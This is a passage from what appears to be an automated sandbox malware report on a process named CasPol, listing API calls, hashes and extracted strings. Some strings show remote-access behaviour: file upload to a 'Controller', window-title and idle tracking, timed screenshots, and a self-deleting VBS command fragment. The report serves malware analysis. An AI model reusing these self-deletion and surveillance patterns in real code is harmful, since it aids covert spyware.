                                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                  • API String ID: 2490988753-744132762
                                                                                                                  • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                  • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                                                                                                  • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                  • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                                                                                                  APIs
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                  • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                  • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                                                                                                  • API String ID: 911427763-1497357211
                                                                                                                  • Opcode ID: 30f4195c6794a9366bb2de9f07a7a45867c5670f1fc2455abb98f24b207642f8
                                                                                                                  • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                                                                                                  • Opcode Fuzzy Hash: 30f4195c6794a9366bb2de9f07a7a45867c5670f1fc2455abb98f24b207642f8
                                                                                                                  • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                                                                                                                  APIs
                                                                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                                                                                                  • GetCursorPos.USER32(?), ref: 0041CB08
                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0041CB11
                                                                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                                                                                                  • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                                                                                                  • ExitProcess.KERNEL32 ref: 0041CB84
                                                                                                                  • CreatePopupMenu.USER32 ref: 0041CB8A
                                                                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                  • String ID: Close
                                                                                                                  • API String ID: 1657328048-3535843008
                                                                                                                  • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                  • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                                                                                                  • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                  • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2509303402-0
                                                                                                                  • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                  • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                                                                                  • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                  • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                  • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                  • API String ID: 1884690901-3066803209
                                                                                                                  • Opcode ID: 157b890a00aff1dc93243e7f043ac0f1883b9fb4f689d54900e142c2c42143bb
                                                                                                                  • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                                                                                  • Opcode Fuzzy Hash: 157b890a00aff1dc93243e7f043ac0f1883b9fb4f689d54900e142c2c42143bb
                                                                                                                  • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                    • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                    • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                    • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                    • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                    • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                  • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                  • API String ID: 3795512280-3163867910
                                                                                                                  • Opcode ID: 8cbf3e03678dcba0d5ddb4510c41cf15fce6de350b9b6fd6a72f9d7f6d16f9a3
                                                                                                                  • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                                                                                  • Opcode Fuzzy Hash: 8cbf3e03678dcba0d5ddb4510c41cf15fce6de350b9b6fd6a72f9d7f6d16f9a3
                                                                                                                  • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                                                                                                  APIs
                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                                                                                    • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                                                                                  • _free.LIBCMT ref: 004500B6
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  • _free.LIBCMT ref: 004500D8
                                                                                                                  • _free.LIBCMT ref: 004500ED
                                                                                                                  • _free.LIBCMT ref: 004500F8
                                                                                                                  • _free.LIBCMT ref: 0045011A
                                                                                                                  • _free.LIBCMT ref: 0045012D
                                                                                                                  • _free.LIBCMT ref: 0045013B
                                                                                                                  • _free.LIBCMT ref: 00450146
                                                                                                                  • _free.LIBCMT ref: 0045017E
                                                                                                                  • _free.LIBCMT ref: 00450185
                                                                                                                  • _free.LIBCMT ref: 004501A2
                                                                                                                  • _free.LIBCMT ref: 004501BA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 161543041-0
                                                                                                                  • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                  • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                                                                                                  • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                  • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                                                                                                  APIs
                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                  • _free.LIBCMT ref: 10007CFB
                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                  • _free.LIBCMT ref: 10007D1D
                                                                                                                  • _free.LIBCMT ref: 10007D32
                                                                                                                  • _free.LIBCMT ref: 10007D3D
                                                                                                                  • _free.LIBCMT ref: 10007D5F
                                                                                                                  • _free.LIBCMT ref: 10007D72
                                                                                                                  • _free.LIBCMT ref: 10007D80
                                                                                                                  • _free.LIBCMT ref: 10007D8B
                                                                                                                  • _free.LIBCMT ref: 10007DC3
                                                                                                                  • _free.LIBCMT ref: 10007DCA
                                                                                                                  • _free.LIBCMT ref: 10007DE7
                                                                                                                  • _free.LIBCMT ref: 10007DFF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 161543041-0
                                                                                                                  • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                  • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                  • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                  • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                  APIs
                                                                                                                  • __EH_prolog.LIBCMT ref: 0041913D
                                                                                                                  • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0041927D
                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041928C
                                                                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                  • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                  • API String ID: 489098229-65789007
                                                                                                                  • Opcode ID: 5540d76b84af48c8b24930b41dec85dffce92f3f7f811bdfea4c6e9bb0e6040e
                                                                                                                  • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                                                                                                  • Opcode Fuzzy Hash: 5540d76b84af48c8b24930b41dec85dffce92f3f7f811bdfea4c6e9bb0e6040e
                                                                                                                  • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                    • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                    • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                    • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                  • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                  • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                  • API String ID: 1913171305-390638927
                                                                                                                  • Opcode ID: 891b1c77f3889e71ee1344af7ac6359a36d5df3dd2e3bd5fb2145de71cb9124a
                                                                                                                  • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                                                                                                                  • Opcode Fuzzy Hash: 891b1c77f3889e71ee1344af7ac6359a36d5df3dd2e3bd5fb2145de71cb9124a
                                                                                                                  • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 269201875-0
                                                                                                                  • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                  • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                                                                                                  • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                  • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                                                                                                  • GetLastError.KERNEL32 ref: 00454AA6
                                                                                                                  • __dosmaperr.LIBCMT ref: 00454AAD
                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                                                                                                  • GetLastError.KERNEL32 ref: 00454AC3
                                                                                                                  • __dosmaperr.LIBCMT ref: 00454ACC
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00454C36
                                                                                                                  • GetLastError.KERNEL32 ref: 00454C68
                                                                                                                  • __dosmaperr.LIBCMT ref: 00454C6F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                  • String ID: H
                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                  • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                  • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                                                                                                  • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                  • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 65535$udp
                                                                                                                  • API String ID: 0-1267037602
                                                                                                                  • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                  • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                                                                                                  • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                  • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                                                                                                  • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                                                                                                  • __dosmaperr.LIBCMT ref: 004393DD
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                                                                                                  • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                                                                                                  • __dosmaperr.LIBCMT ref: 0043941A
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                                                                                                  • __dosmaperr.LIBCMT ref: 0043946E
                                                                                                                  • _free.LIBCMT ref: 0043947A
                                                                                                                  • _free.LIBCMT ref: 00439481
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2441525078-0
                                                                                                                  • Opcode ID: 2894fcbb1f162653cfe1ba04bc0a5a8f03630905280e1a3511de0c112cb5b03f
                                                                                                                  • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                                                                                                                  • Opcode Fuzzy Hash: 2894fcbb1f162653cfe1ba04bc0a5a8f03630905280e1a3511de0c112cb5b03f
                                                                                                                  • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                                                                                                                  APIs
